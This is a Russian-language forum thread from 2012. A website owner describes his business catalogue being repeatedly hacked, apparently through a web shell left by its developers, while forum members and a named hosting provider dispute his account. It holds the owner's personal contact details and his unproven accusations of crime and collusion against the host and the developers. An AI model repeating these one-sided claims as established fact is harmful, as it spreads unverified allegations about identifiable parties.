Спустя 1 час, 5 минут, 17 секунд (18.05.2012 - 17:52) Питер написал(а):
Я не программер. Но пришлось разбираться.
Самое интересное - был свидетелем примерно такой же ситуации данных разработчиков с другим заказчиком - может быть и стремным - и только после того как сам попал - понял что значили тогдашние финты - оставить беки, хвосты и прочие возможности.
Просто тогда не обратил внимание. Не думал, что посмеют.
А потом понял - что так эти разработчики поступают всегда. Стиль такой. На всякий случай. И я не исключение.
Короче, десять раз предлагать не буду. Отдам в хорошие руки - не кривые на 2 года или больше под договор на доработку данного кривого сайта или по новой все сделать.
Или слабо?
Самое интересное - был свидетелем примерно такой же ситуации данных разработчиков с другим заказчиком - может быть и стремным - и только после того как сам попал - понял что значили тогдашние финты - оставить беки, хвосты и прочие возможности.
Просто тогда не обратил внимание. Не думал, что посмеют.
А потом понял - что так эти разработчики поступают всегда. Стиль такой. На всякий случай. И я не исключение.
Короче, десять раз предлагать не буду. Отдам в хорошие руки - не кривые на 2 года или больше под договор на доработку данного кривого сайта или по новой все сделать.
Или слабо?
Спустя 12 минут, 29 секунд (18.05.2012 - 18:05) johniek_comp написал(а):
Питер
если по договору только. пиши в скайп.
если по договору только. пиши в скайп.
Спустя 7 минут, 35 секунд (18.05.2012 - 18:12) Питер написал(а):
Скайп vin-09
Аська 4943481
майл - a@09.ua
Город Винница.
Петр
Спустя 13 минут, 47 секунд (18.05.2012 - 18:26) johniek_comp написал(а):
Питер
написал в скайп
написал в скайп
Спустя 13 часов, 22 минуты, 5 секунд (19.05.2012 - 07:48) redreem написал(а):
Спустя 2 часа, 54 минуты, 11 секунд (19.05.2012 - 10:42) Питер написал(а):
На самом деле - задумка была большая - не вконтакте, но и не на стандартных движках. Должны были копироваться некоторые сервисы с prom.ua и сайт в сайте (сайт.09.ua) уже был реализован в какой то мере - глючило безбожно.
Тоесть за 60 штук было реализовано 3-4 кнопки - регистрация (предприятия и пользователя), потом сайт в сайте и контакты (просто страница) и поиск - сфинкс.
Пару стандартных сервисов - как в друпале или джумле - программеры прикрутили без ТЗ (мне оно и не нужно особо) - но видать делали то в чем разбирались - для виду - типа работа сделана. Часы посчитали - денег взяли.
Но все вместе - не работало!!!!
Отдельный сервис - пока сидит программист - идет. Проходит день - торба...
Поиск лег, при регистрации - народ пишет, что пол часа даром потрачено - я вношу чуть ли не из базы данных вручную, из админки, с правами суперпользователя - иначе никак!
Тоесть за 60 штук было реализовано 3-4 кнопки - регистрация (предприятия и пользователя), потом сайт в сайте и контакты (просто страница) и поиск - сфинкс.
Пару стандартных сервисов - как в друпале или джумле - программеры прикрутили без ТЗ (мне оно и не нужно особо) - но видать делали то в чем разбирались - для виду - типа работа сделана. Часы посчитали - денег взяли.
Но все вместе - не работало!!!!
Отдельный сервис - пока сидит программист - идет. Проходит день - торба...
Поиск лег, при регистрации - народ пишет, что пол часа даром потрачено - я вношу чуть ли не из базы данных вручную, из админки, с правами суперпользователя - иначе никак!
Спустя 2 минуты, 17 секунд (19.05.2012 - 10:45) Питер написал(а):
Жаль,
а идея была не плохая. Только руки нужны прямые и не злобные.
Отдам в хорошие руки.
а идея была не плохая. Только руки нужны прямые и не злобные.
Отдам в хорошие руки.
Спустя 39 минут, 35 секунд (19.05.2012 - 11:24) redreem написал(а):
да не возьмет никто. проще с нуля написать свое.
Спустя 3 часа, 24 минуты, 58 секунд (19.05.2012 - 14:49) Guest написал(а):
Каталог начинал реально работать - регистрировались фирмы, развивалось доверие к ресурсу.
Почти 30 тыс посетителей в месяц, рейтинг. И это все на кривом ПО. Правда я оптимизировал, раз-СЕО-шил его.
Работы проделал - целый год. А эти с...и ломали свое ПО целый месяц - и каждый раз иначе.
Договорились с мен--ми и с провайдером - денег требовали. Те обе структуры в один голос - все нормально, ошибка админа. На следующий день снова - повалили. Потом снова и снова.
А провайдер - Гудхостер. Не рекомендую пользоваться, если не хотите попасть в мое положение.
Как мне показалось - давали они коды доступа этим гав...-кодерам. Еле успел по горячему скачать логи доступа.
Почему я и задал вопрос - был ли взлом?
Почти 30 тыс посетителей в месяц, рейтинг. И это все на кривом ПО. Правда я оптимизировал, раз-СЕО-шил его.
Работы проделал - целый год. А эти с...и ломали свое ПО целый месяц - и каждый раз иначе.
Договорились с мен--ми и с провайдером - денег требовали. Те обе структуры в один голос - все нормально, ошибка админа. На следующий день снова - повалили. Потом снова и снова.
А провайдер - Гудхостер. Не рекомендую пользоваться, если не хотите попасть в мое положение.
Как мне показалось - давали они коды доступа этим гав...-кодерам. Еле успел по горячему скачать логи доступа.
Почему я и задал вопрос - был ли взлом?
Спустя 10 минут, 43 секунды (19.05.2012 - 15:00) killer8080 написал(а):
| Цитата (Guest @ 19.05.2012 - 14:49) |
| Как мне показалось - давали они коды доступа этим гав...-кодерам. |
пароли им не нужны были, в их распоряжении был веб шел
Спустя 7 минут, 50 секунд (19.05.2012 - 15:08) Michael написал(а):
Мне одному кажется что ТС на неприсутствующих тут разработчиков напраслину какую то наводит?
Со своей колокольни звездит не краснея.
Со своей колокольни звездит не краснея.
Спустя 7 минут, 19 секунд (19.05.2012 - 15:15) Питер написал(а):
Возьми код да и сам убедись...
Оцени -
1.Стоимость
2.Проф-ть
Оцени -
1.Стоимость
2.Проф-ть
Спустя 6 минут, 57 секунд (19.05.2012 - 15:22) inpost написал(а):
Питер
Я правильно понял, есть крупный сайт, разработка которого over 10`000$. Он кривой в каждом модуле и надо его переделать и всё сделать. При средней работе над сайтом - полная его готовность будет через 1(!!!) год. Вместо того, чтобы нанять на 1 год программиста штатного, ты его "как бы даришь", а как работа будет сделана - заберёшь обратно себе...
Нечто вроде "сделайте мне бесплатно".
Я правильно понял, есть крупный сайт, разработка которого over 10`000$. Он кривой в каждом модуле и надо его переделать и всё сделать. При средней работе над сайтом - полная его готовность будет через 1(!!!) год. Вместо того, чтобы нанять на 1 год программиста штатного, ты его "как бы даришь", а как работа будет сделана - заберёшь обратно себе...
Нечто вроде "сделайте мне бесплатно".
Спустя 10 минут, 36 секунд (19.05.2012 - 15:33) Питер написал(а):
30 ВМЗ тому что сделает аудит.
Зенд фреймворк.
Код мне нафиг не нужен такой как есть.
Отдам вместе с кучерявыми доменами - 09.ua BiznesSpravka.ua BiznesDovidka.ua
на определенное количество времени - делайте что хотите - желательно в разрезе названия и предыдущей разработки.
Все, что успеете заработать за это время- Ваше. Мне - то что будет через пару лет, готовый продукт - можно остаться в проекте - развивать.
Там работы - на всю оставшуюся...
Зенд фреймворк.
Код мне нафиг не нужен такой как есть.
Отдам вместе с кучерявыми доменами - 09.ua BiznesSpravka.ua BiznesDovidka.ua
на определенное количество времени - делайте что хотите - желательно в разрезе названия и предыдущей разработки.
Все, что успеете заработать за это время- Ваше. Мне - то что будет через пару лет, готовый продукт - можно остаться в проекте - развивать.
Там работы - на всю оставшуюся...
Спустя 28 минут, 2 секунды (19.05.2012 - 16:01) Michael написал(а):
| Цитата (Питер) |
| 30 ВМЗ тому что сделает аудит. |
ну видите, бережливым они вас хотя бы быть научили.
Спустя 11 минут, 3 секунды (19.05.2012 - 16:12) Питер написал(а):
Некогда мне иронизировать.
Придумайте сами выгодные условия.
А по-...-деть я и сам люблю. Только некогда
Придумайте сами выгодные условия.
А по-...-деть я и сам люблю. Только некогда
Спустя 5 часов, 32 минуты, 43 секунды (19.05.2012 - 21:44) inpost написал(а):
Может и мне такое написать на форуме... народ, делайте мне сайт, можете делать целый год, и пока вы его делаете - он ваш, ну как сделаете, извиняйте, я заберу его себе и деньги буду собирать... хитрые же люди бывают...
Спустя 1 час, 4 минуты, 5 секунд (19.05.2012 - 22:48) qari написал(а):
Используйте для определения уязвисмости OWASP ZAP! Но естественно все 100% он Вам не определит! Но все моменты которые в логах программой бы все показало!
По логам видно, что ШЕЛ уже был залит ранее!
По логам видно, что ШЕЛ уже был залит ранее!
Спустя 1 минута, 28 секунд (19.05.2012 - 22:50) qari написал(а):
| Цитата (qari @ 19.05.2012 - 19:48) |
| Используйте для определения уязвисмости OWASP ZAP! Но естественно все 100% он Вам не определит! Но все моменты которые в логах программой бы все показало! По логам видно, что ШЕЛ уже был залит ранее! |
Но лучше конечно писать изначально со всем пониманием в безопасности! Это не так сложно как кажеться!
Спустя 5 минут, 23 секунды (19.05.2012 - 22:55) qari написал(а):
| Цитата (Питер @ 19.05.2012 - 12:33) |
| 30 ВМЗ тому что сделает аудит. Зенд фреймворк. Код мне нафиг не нужен такой как есть. Отдам вместе с кучерявыми доменами - 09.ua BiznesSpravka.ua BiznesDovidka.ua на определенное количество времени - делайте что хотите - желательно в разрезе названия и предыдущей разработки. Все, что успеете заработать за это время- Ваше. Мне - то что будет через пару лет, готовый продукт - можно остаться в проекте - развивать. Там работы - на всю оставшуюся... |
Такая работа стоит не 30 баксов, а от 500 как минимум!
А вообще мой совет, реализуйте себе АНТИВИРУС по файлам на MD5 на новые, на удаленные и на измененные! И при первой реакции пусть Вам шлет СМС на телефон! И Вы как скорая помощь к сайту! Запустили тестинг антивиря и он Вам показал причину срабатывания сразу на файл!
Спустя 25 минут, 27 секунд (19.05.2012 - 23:21) Питер написал(а):
inpost
За 2 года prom.ua - вышли на оборот с 6 нулями. А начинали делать обычные программисты, по ходу исправляя ошибки и развивая идею.
Если слабо - только и остается что говорить о чужой хитрости.
За 2 года prom.ua - вышли на оборот с 6 нулями. А начинали делать обычные программисты, по ходу исправляя ошибки и развивая идею.
Если слабо - только и остается что говорить о чужой хитрости.
Спустя 15 минут, 2 секунды (19.05.2012 - 23:36) Питер написал(а):
Да код как код.
Ничего особенного. Как и в друпале том же новый функционал - новая папочка - прилепил - работает. Четко все те же фиксы с друпала (вордпреса) только под свой движок. Смотрели уже умельцы. Понтовались буд-то за 2 недели это все делается и что там было на год делать?
За 500 б можно все уже и поправить. Если руки нормальные иметь.
Ничего особенного. Как и в друпале том же новый функционал - новая папочка - прилепил - работает. Четко все те же фиксы с друпала (вордпреса) только под свой движок. Смотрели уже умельцы. Понтовались буд-то за 2 недели это все делается и что там было на год делать?
За 500 б можно все уже и поправить. Если руки нормальные иметь.
Спустя 7 минут, 4 секунды (19.05.2012 - 23:43) rooor написал(а):
| Цитата (Питер @ 19.05.2012 - 23:36) |
| За 500 б можно все уже и поправить. Если руки нормальные иметь. |
а за 1000 заново написать...
Спустя 15 минут, 49 секунд (19.05.2012 - 23:59) Питер написал(а):
Может быть
Я в оптимизацию и СЕО вложил денег и усилий на 10т
Отшлифовал технологию, баги отлавливал пачками.
Титлы, теги Н1 - 3, урлы - только первого уровня после главной, многоязычие (своя фишка в случае если перевод совпалает с оригиналом) - ... вот только не работало оно как надо - кривые руки у разработчиков. Меньше бы пили и вконтакте лазили - а то год прошел...
Я в оптимизацию и СЕО вложил денег и усилий на 10т
Отшлифовал технологию, баги отлавливал пачками.
Титлы, теги Н1 - 3, урлы - только первого уровня после главной, многоязычие (своя фишка в случае если перевод совпалает с оригиналом) - ... вот только не работало оно как надо - кривые руки у разработчиков. Меньше бы пили и вконтакте лазили - а то год прошел...
Спустя 3 минуты, 2 секунды (20.05.2012 - 00:02) rooor написал(а):
а теперь за 500 вы хотите получить новый сайт))
Спустя 10 минут, 17 секунд (20.05.2012 - 00:12) Питер написал(а):
Мля - месяц назад понятия не имел. Начал читать код - вижу - среди вас ребята...
Мне каждую строчку пытались впихнуть за 100 баксов.
Да хр. с ним. Свяжи их вместе, чтоб работало.
Ничего не хочу - воротит уже. Наоборот отдаю!
Возьми - да покажи, на что способен.
Мне каждую строчку пытались впихнуть за 100 баксов.
Да хр. с ним. Свяжи их вместе, чтоб работало.
Ничего не хочу - воротит уже. Наоборот отдаю!
Возьми - да покажи, на что способен.
Спустя 12 минут, 33 секунды (20.05.2012 - 00:24) rooor написал(а):
| Цитата (Питер @ 20.05.2012 - 00:12) |
| Возьми - да покажи, на что способен. |
не хочу
| Цитата |
| Ничего не хочу - воротит уже. Наоборот отдаю! |
вот тут надо было так написать: не отдаю, а даю во временное распоряжение, для исправления ошибок и раскрутки, чтобы потом забрать готовый сайт
| Цитата |
| Свяжи их вместе, чтоб работало. |
людей здесь много, мож кто возьмёт
Спустя 2 часа, 8 минут, 9 секунд (20.05.2012 - 02:33) inpost написал(а):
rooor
Кто захочет просто так делать другому человеку бизнес?
Питер
Да, сделали, но сделали они себе, а не чужому дядьке, который теперь деньги гребёт, а они работали бесплатно, типо "им одолжили"
Кто захочет просто так делать другому человеку бизнес?
Питер
Да, сделали, но сделали они себе, а не чужому дядьке, который теперь деньги гребёт, а они работали бесплатно, типо "им одолжили"
Спустя 7 часов, 34 минуты, 25 секунд (20.05.2012 - 10:07) Питер написал(а):
Хочу увидеть форумчанина - кто на себя работает...
Кто может не таясь показать сделанное уже.
Может кто с Zend знаком?
Кто нибудь делал каталог по нормальному то? Ну или доску объявлений...
В дело зову. Не хошь - ну и живи тут на постах и постном масле...
Написал же - даю - твори как можешь. Заинтересуешь - доля твоя. Всегда договориться можно.
А не можешь - че время отнимать друг у друга? Прочитал - не нужно - отвалил...
Кто может не таясь показать сделанное уже.
Может кто с Zend знаком?
Кто нибудь делал каталог по нормальному то? Ну или доску объявлений...
В дело зову. Не хошь - ну и живи тут на постах и постном масле...
Написал же - даю - твори как можешь. Заинтересуешь - доля твоя. Всегда договориться можно.
А не можешь - че время отнимать друг у друга? Прочитал - не нужно - отвалил...
Спустя 2 часа, 7 минут, 36 секунд (20.05.2012 - 12:15) inpost написал(а):
Питер
Сайта нет, есть лишь намёки на то, что кто-то что-то криво и неправильно делал. Если абсолютно всё не работает, то абсолютно всё нужно будет переделывать. Если всё переделывать - то, считай, что сайт делается с нуля, так как по объему выйдет точно так же.
Домен абсолютно не раскрученный и пустой, ссылок и ничего другого нет.
Получается, ты даёшь идею, я работаю год, ты отбираешь готовый продукт бесплатно, ну и можешь дать % от бизнеса? Вопрос, а что ты сделал, чтобы я в итоге захочу делиться с тобой? Да ничего, я тебя тоже кидану и заберу проект себе.
Хочешь жить спокойно - нанимай нормальных программистов и следи за проектом.
У многих на нашем сайте есть идеи, и очень часто они появляются, но люди говорят: "я тоже буду участвовать как: " (программист, дизайнер, верстальщик)... а не просто "назову идею", а дальше как хотите.
И что это за неуважительные сообщения: "Не хошь - ну и живи тут на постах и постном масле...". "А не можешь"... Тебе же уже сказали, что никто не хочет, не хочет быть дураком.
Если ты считаешь, что за 500$ можно исправить всё на сайте, это 1,5 недели работы нормальному профи, зачем тянуть целый год, а то и 2. Пишешь т/з, что исправить надо и на фриланс, там тебе за неделю всё исправят. Только найдутся ли люди делать дофига работы за 500$... это тоже вопрос.
Сайта нет, есть лишь намёки на то, что кто-то что-то криво и неправильно делал. Если абсолютно всё не работает, то абсолютно всё нужно будет переделывать. Если всё переделывать - то, считай, что сайт делается с нуля, так как по объему выйдет точно так же.
Домен абсолютно не раскрученный и пустой, ссылок и ничего другого нет.
Получается, ты даёшь идею, я работаю год, ты отбираешь готовый продукт бесплатно, ну и можешь дать % от бизнеса? Вопрос, а что ты сделал, чтобы я в итоге захочу делиться с тобой? Да ничего, я тебя тоже кидану и заберу проект себе.
Хочешь жить спокойно - нанимай нормальных программистов и следи за проектом.
У многих на нашем сайте есть идеи, и очень часто они появляются, но люди говорят: "я тоже буду участвовать как: " (программист, дизайнер, верстальщик)... а не просто "назову идею", а дальше как хотите.
И что это за неуважительные сообщения: "Не хошь - ну и живи тут на постах и постном масле...". "А не можешь"... Тебе же уже сказали, что никто не хочет, не хочет быть дураком.
Если ты считаешь, что за 500$ можно исправить всё на сайте, это 1,5 недели работы нормальному профи, зачем тянуть целый год, а то и 2. Пишешь т/з, что исправить надо и на фриланс, там тебе за неделю всё исправят. Только найдутся ли люди делать дофига работы за 500$... это тоже вопрос.
Спустя 30 минут, 20 секунд (20.05.2012 - 12:45) Питер написал(а):
До этого - один позитив типа был?
И хитрецом обозвали и еще там чего...
За себя отвечай. Только слов много как то...
Сказал - отдаю в хорошие руки. Сам занимаюсь другой темой. Попробовал раз - нарвался на ...
Да и некогда. Каждый должен заниматься своим делом. Не мое это. Хотя делаю я если - то нормальному -
- за 4 месяца региональный макет проекта для небольшого города - Винницы 09.vn.ua - раскрутил что посещало 1200 ч в день, рейтинг, PR-2. Тиц и все такое.
Г-на много и г-нокодеров. А чего толку - мож надо кому, лежит хламом. Не надо не тусуйся.
И хитрецом обозвали и еще там чего...
За себя отвечай. Только слов много как то...
Сказал - отдаю в хорошие руки. Сам занимаюсь другой темой. Попробовал раз - нарвался на ...
Да и некогда. Каждый должен заниматься своим делом. Не мое это. Хотя делаю я если - то нормальному -
- за 4 месяца региональный макет проекта для небольшого города - Винницы 09.vn.ua - раскрутил что посещало 1200 ч в день, рейтинг, PR-2. Тиц и все такое.
Г-на много и г-нокодеров. А чего толку - мож надо кому, лежит хламом. Не надо не тусуйся.
Спустя 6 минут, 58 секунд (20.05.2012 - 12:52) inpost написал(а):
PR-3 дают новому чистому сайту, который имеет правильную верстку.
Спустя 3 минуты, 20 секунд (20.05.2012 - 12:55) Питер написал(а):
Дай ссылку гляну.
Спустя 41 минута, 25 секунд (20.05.2012 - 13:37) TMake написал(а):
| Цитата (Питер @ 20.05.2012 - 13:45) |
| рейтинг, PR-2 |
рассмешил.
Я не пойму в чем сыр бар?
Нужна работа программиста - нужна адекватная цена.
А бесплатно здесь ни кого не найдешь...
Спустя 17 минут, 49 секунд (20.05.2012 - 13:55) Питер написал(а):
Пустое.
Маркетинговое исследование закончено.
Интересно было. Посмеялись даже. Хоть и конструктива ...
Не программер я, так что уж извиняйте.
А с деловыми предложениями - в личку.
Пока...
Маркетинговое исследование закончено.
Интересно было. Посмеялись даже. Хоть и конструктива ...
Не программер я, так что уж извиняйте.
А с деловыми предложениями - в личку.
Пока...
Спустя 1 месяц, 9 дней, 1 час, 26 минут, 10 секунд (29.06.2012 - 15:21) Goodhoster написал(а):
Здравствуйте.
Хочу все-таки объяснить как это выглядело со стороны хостинг-провайдера...
Странно человек пытается снова развести разработчиков чтобы делали проект и потом типа как прибыль делить что-ли.... подозреваю что с прошлыми разработчиками точно также хотели чтобы бесплатно делали. какие могут быть 10т $, это за что ... хорошие цифры чтобы заинтересовать новых разрабов ;-)
это так мысли вслух ...
и теперь по существу:
Хочу все-таки объяснить как это выглядело со стороны хостинг-провайдера...
Странно человек пытается снова развести разработчиков чтобы делали проект и потом типа как прибыль делить что-ли.... подозреваю что с прошлыми разработчиками точно также хотели чтобы бесплатно делали. какие могут быть 10т $, это за что ... хорошие цифры чтобы заинтересовать новых разрабов ;-)
это так мысли вслух ...
и теперь по существу:
| Цитата |
Договорились с мен--ми и с провайдером - денег требовали. Те обе структуры в один голос - все нормально, ошибка админа. На следующий день снова - повалили. Потом снова и снова. А провайдер - Гудхостер. Не рекомендую пользоваться, если не хотите попасть в мое положение. |
никогда Goodhoster.NET не требовали денег ни от кого из клиентов и никогда не предоставляли доступ третьим лицам, которые не являлись владельцем хостинг-аккаунта.
Вообще странная позиция, раздавать доступ на сервер всем кому-попало, а потом во всем обвинить хостера. При том хостер на протяжении всего месяца постоянно помогали с блокировкой дыр и с анализом лог-файлов.
| Цитата |
Как мне показалось - давали они коды доступа этим гав...-кодерам. Еле успел по горячему скачать логи доступа. |
Это вообще бред полный, что значит Вы по гарячему скачали логи ? Вам по запросу выдали все лог-файлы и точно также на диску передали по запросу в СБУ. У нас до сих пор сохраняется копия Вашего виртуального сервера, на случай неадекватности клиента, чтобы разобраться.
И самое главное, если вдруг решили свои проблемы с разработчиками или свою неопытность переложить на плечи хостера, тогда попробуйте прочитать условия использования услуг пункт 15. Ограничение ответственности:
http://goodhoster.net/ru/hosting-docs/terms-of-service/
Хочу прояснить нашу позицию как и любого другого хостера:
мы не намерены участвовать в разборках заказчика с разработчиками или с другими третьими лицами. Мы предоставляем хостинг и делаем своевременно бэкапы, с которых вам неоднократно восстанавливали работу сайта, вам помогали определить каике-либо дыры на сайте и закрывать их. Со своей стороны поддержки техническая делала свою работу, вы обращались не один раз в сутки и вам ни разу не было отказано в запросах.
Если были бы какие-либо претензии по стабильности хостинга или по технической поддержке ... тогда другой вопрос... при таких случаях также предусмотрена компенсация оплаченного хостинга... А так, вы видите что в сайте есть дыры в самомо сайте и к настройкам сервера никак не относятся и при этом начинаете винить хостера ...
Да, понимаю, возможно у вас какие-либо неприятности с разработчиками случились и не собираюсь судить кто прав кто виноват. Но таких хитрых много, кто заплатив 10-40$ в месяца за хостинг хотят чтобы хостер отвечал за какие-то 60 тыс грн заплаченные не известно кому ... да при чем здесь вообще хостер в том, что вы никак не перестраховались или что вы что-то не поделили с разработчиками ?
точно также в СБУ не было указано что взлома не было. А было указано в записке, что у вас был полный доступ к серверу и не исключено что вы могли сами нарушить работу сайта, повлиять на безопасность сервера или предоставить его третьим лицам.
Как мы можем отвечать за безопасность сервера если вы раздаете пароль root суперпользователя кому хотите ? При этом наша техническая поддержка все время выполняла ваши запросы, помогала анализировать логи, восстанавливать сайт из бэкапа и т.д.
Посудите сами, если бы мы были с разработчиками за одно, зачем нам вести логи ? мы могли бы из просто отключить и удалить, но зачем нам терять репутацию, которая создавалась годами ?
Да, и открою секрет кто не знает - мы разработаем с веб-студиями как любой нормальный хостер. Они приводят нам клиентов - мы делаем им скидки и даже кто хочет зарабатывает на партнерке. Также, запросы и просьбы от веб-студий более приоритетные и более лояльно выполняются, это понятно. То есть, практика работы с веб-студиями есть, но никогда веб-студия не может получить доступ к аккаунту клиента, если она не является владельцем аккаунта. Это сотрудничество на уровне: привели клиента - спасибо получите свой пряник и не больше.
Также, веб-студиям удобно работать с одним партнером, зная уже качество предоставления услуг, увеличивая бонусы и получая более лояльное отношение к себе.
спасибо за внимание.
Спустя 1 день, 5 часов, 45 минут, 46 секунд (30.06.2012 - 21:06) Питер написал(а):
Ага - на воре таки сгорела шапка --- ха, ха ха. Выложу сканы в Интернет - а уж там народ пусть решает - стоит ли доверять этому Гудхостеру. Именно <Специалисты> Гудхостера делали анализ вышеописанных логов и авторитетно заявили - все зашибись ошибка админа - документик то с печатью!. По моим меркам - соучастие в данном преступлении - именно Гудхостер помог замести следы. Будет отдельный домен - Gudhoster0tzivi.net - и последующие 50 лет народ будет знать что за хостер - этот
Спустя 2 минуты, 25 секунд (30.06.2012 - 21:09) Питер написал(а):
А по качеству хостинга - отдельный скан имеется - но это уже совсем другая страница - за неделю яндекс 25 раз предупреждал о недоступности сервиса - возвращайте бабло гады!
Спустя 18 часов, 19 минут, 44 секунды (1.07.2012 - 15:29) killer8080 написал(а):
Питер
Я не понимаю ваших претензий к хостеру. Сайт ломался через веб шел, который заложили разработчики, на случай кидалова (очевидно не напрасно). Ломать сайт могли только те, кто оставил закладку. Хостер не несет никакой ответственности за уязвимости ваших скриптов. В чем собственно проблема?
Я не понимаю ваших претензий к хостеру. Сайт ломался через веб шел, который заложили разработчики, на случай кидалова (очевидно не напрасно). Ломать сайт могли только те, кто оставил закладку. Хостер не несет никакой ответственности за уязвимости ваших скриптов. В чем собственно проблема?
| Цитата (Питер @ 30.06.2012 - 21:06) |
| По моим меркам - соучастие в данном преступлении - именно Гудхостер помог замести следы. |
бред какой то. Вам же предоставили логи сервера, о каких следах идет речь?PS если бы разработчики получили 10 000$ за сайт (с ваших слов), вряд ли бы у них возникло желание на гадить такому клиенту. Похоже разработчиков вы таки кинули. Но причем тут хостер?
Спустя 51 минута, 26 секунд (1.07.2012 - 16:20) Питер написал(а):
Если бы Гудхостер сразу же среагировал - признал - что есть взлом - а это уже даже ежику стало понятно - сделал так как того требует этика - то еще потом целый месяц подряд бы не ломали сайт после первого взлома.
Именно и -за Гудхостера закрыли дело менты, откупились говнокодеры и ушли от ответственности.
Бред ли - а народ - читай и думай.... Хороший ли этот Гуд.
Вот выложишь ты свой сайт. Бац! А там уже кто то хозяйничает. Ты к такому вот Худ-хостеру - дай логи, посодействуй, .... -- а там тебе - все окей, так и надо. Вот уплати хакерам денежку, чтоб не ломали дальше еще целый месяц и продолжай пользоваться хостингом!!!
Вот где оно соучастие...
Именно и -за Гудхостера закрыли дело менты, откупились говнокодеры и ушли от ответственности.
Бред ли - а народ - читай и думай.... Хороший ли этот Гуд.
Вот выложишь ты свой сайт. Бац! А там уже кто то хозяйничает. Ты к такому вот Худ-хостеру - дай логи, посодействуй, .... -- а там тебе - все окей, так и надо. Вот уплати хакерам денежку, чтоб не ломали дальше еще целый месяц и продолжай пользоваться хостингом!!!
Вот где оно соучастие...
Спустя 11 минут, 50 секунд (1.07.2012 - 16:32) Питер написал(а):
Выложу в нет аудиозапись - где главный гавнокодер при свидетелях говорит - долгов по оплате нет, все сделаем красиво, договор подпишем, доделаем -- специально домен выделю и залью туда весь компромат.
А то бзеть долго можно. Платил, не платил.
Тут другое - взялся.... и надорвался. Берется кто не попади - за серьезную работу, а умения нету.
Ну не получилось - верни бабло и делай себе спокойно сайты-визитки, там тебе и место. Но зачем же ломать и цирк устраивать. Типа я потом не разберусь в суете...
Вот такие вот у вас коллеги, господа программисты. Не оправдывать нужно, а презирать такую шушеру нужно, ТЕНЬ это на весь чесной народ.
А то бзеть долго можно. Платил, не платил.
Тут другое - взялся.... и надорвался. Берется кто не попади - за серьезную работу, а умения нету.
Ну не получилось - верни бабло и делай себе спокойно сайты-визитки, там тебе и место. Но зачем же ломать и цирк устраивать. Типа я потом не разберусь в суете...
Вот такие вот у вас коллеги, господа программисты. Не оправдывать нужно, а презирать такую шушеру нужно, ТЕНЬ это на весь чесной народ.
Спустя 4 минуты, 52 секунды (1.07.2012 - 16:37) killer8080 написал(а):
| Цитата (Питер @ 1.07.2012 - 16:20) |
| Если бы Гудхостер сразу же среагировал - признал - что есть взлом - а это уже даже ежику стало понятно - сделал так как того требует этика - то еще потом целый месяц подряд бы не ломали сайт после первого взлома. |
Хостеры не занимаются анализом уязвимостей ваших скриптов. Вам предоставили логи сервера. Какие могут быть претензии к провайдеру? Вы могли обратится к независимым экспертам по безопасности, дыры можно было прикрыть в два счета. Вместо этого вы сами регулярно поднимали уязвимые скрипты из бекапа. Взлома со стороны сервера не было как такового.
| Цитата (Питер @ 1.07.2012 - 16:32) |
| Вот такие вот у вас коллеги, господа программисты. Не оправдывать нужно, а презирать такую шушеру нужно, ТЕНЬ это на весь чесной народ. |
Я не знаю вашей ситуации с программистами, но на хостера вы напраснену гоните, это очевидно.
Спустя 13 минут, 41 секунда (1.07.2012 - 16:50) Питер написал(а):
Я вроде четко пишу и по русски.
Дали запрос на Гудхостера - те (замечу что не работяги, а директор) - дали ответ и расшифровку вышеприведенных логов - если бы ответили, что не знаем мол и не наше это дело - то тогда бы - приняли к сведению оценку независимых экспертов или еще чего.
Оценка эта была сделана в первый же день, но менты не взяли ее к сведению - есть же авторитетное заключение Гудхостера - все нормально...
Я специально оставляю - все как есть плюс небольшие заплатки - чтоб посмотреть все уязвимости - это ж бесплатная проверка сайта на говно.
Его конечно же вялят - но по другому уже ... И так 30 дней. Два десятка уязвимостей.
Всю дорогу - работяги помогают мне, а руководители Гудхостера заметают следы - в сговоре с хакерами.
Дали запрос на Гудхостера - те (замечу что не работяги, а директор) - дали ответ и расшифровку вышеприведенных логов - если бы ответили, что не знаем мол и не наше это дело - то тогда бы - приняли к сведению оценку независимых экспертов или еще чего.
Оценка эта была сделана в первый же день, но менты не взяли ее к сведению - есть же авторитетное заключение Гудхостера - все нормально...
Я специально оставляю - все как есть плюс небольшие заплатки - чтоб посмотреть все уязвимости - это ж бесплатная проверка сайта на говно.
Его конечно же вялят - но по другому уже ... И так 30 дней. Два десятка уязвимостей.
Всю дорогу - работяги помогают мне, а руководители Гудхостера заметают следы - в сговоре с хакерами.
Спустя 5 минут, 16 секунд (1.07.2012 - 16:56) Питер написал(а):
Можна подумать я расшифровки логов не зал? С первого дня...
Все ждал - когда же на столь уважаемом форуме проявятся Г-кодеры, а тут такая удача - Гудхостер объявился.
Я в еще 10 форумов запихнул вопрос. И только так пока могу рассказать народу - как оно может быть. А тут уж личное дело как и что видеть.
Все ждал - когда же на столь уважаемом форуме проявятся Г-кодеры, а тут такая удача - Гудхостер объявился.
Я в еще 10 форумов запихнул вопрос. И только так пока могу рассказать народу - как оно может быть. А тут уж личное дело как и что видеть.
Спустя 10 минут, 42 секунды (1.07.2012 - 17:06) inpost написал(а):
Питер
Без единого разрыва. Интернет-мем. Так вот в данном случае ты ведёшь себя точно так же как вел себя автор звонка. Послушай на досуге и сделай выводы.
Всё, что я вижу - попытка поливать грязью хостеров, которые не имеют вообще отношения к происходящему, так как они не имеют отношения к кривым скриптам.
Ах да, я выложу скан, всё есть... вы мне поверьте, но это действительно есть... Знаешь как на суде? Пока документ не предоставишь - твои слова пустое место. Хочешь, чтобы люди судили других людей? То умные люди уже придумали правила: "без доказательств не виновен". Оно называется: "Презумпция невиновности".
Без единого разрыва. Интернет-мем. Так вот в данном случае ты ведёшь себя точно так же как вел себя автор звонка. Послушай на досуге и сделай выводы.
Всё, что я вижу - попытка поливать грязью хостеров, которые не имеют вообще отношения к происходящему, так как они не имеют отношения к кривым скриптам.
Ах да, я выложу скан, всё есть... вы мне поверьте, но это действительно есть... Знаешь как на суде? Пока документ не предоставишь - твои слова пустое место. Хочешь, чтобы люди судили других людей? То умные люди уже придумали правила: "без доказательств не виновен". Оно называется: "Презумпция невиновности".
| ! |
inpost |